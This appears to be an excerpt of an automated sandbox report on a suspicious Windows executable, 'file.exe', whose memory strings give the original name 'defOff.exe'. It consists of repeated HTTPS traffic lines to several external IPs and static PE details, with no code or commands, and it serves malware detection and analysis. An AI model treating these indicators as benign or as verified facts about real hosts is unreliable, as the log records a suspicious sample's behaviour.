        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
        Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
        Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
        Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
        Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
        Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
        Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
        Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
        Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
        Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
        Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
        Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
        Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
        Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
        Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
        Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
        Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
        Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
        Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
        Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.4:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49774 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49821 version: TLS 1.2

        System Summary

        barindex
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: .idata
        Source: file.exeStatic PE information: section name:
        Source: file.exeBinary or memory string: OriginalFilename vs file.exe
        Source: file.exe, 00000000.00000003.2067029729.0000000005804000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066426183.0000000005413000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2073452507.0000000005AC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061670300.00000000058CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2071537327.0000000005945000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2074149643.000000000580C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2075355119.000000000580C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062327948.000000000598E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060006996.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2065904646.000000000590A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2071301616.0000000005811000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2064128396.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2064791247.00000000058E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2058712097.000000000589A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069968836.0000000005925000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061013705.00000000058B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066572141.0000000000806000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2068657406.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2065394077.00000000059DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2068323868.0000000005A2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2067289564.0000000005A20000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2064685130.0000000005804000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2072638055.000000000580C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060512749.00000000058AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2058345261.0000000005602000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061960419.00000000058CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069183339.000000000592F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060167989.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2072910046.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2067869231.0000000005806000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061583463.000000000580D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2063260466.00000000058D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2058563350.0000000005468000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062819649.00000000058C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2058785486.0000000005463000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2070094590.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2059923704.000000000593E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2070943779.000000000580D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2063558968.00000000058D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061843765.000000000580A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2063690840.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069630178.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
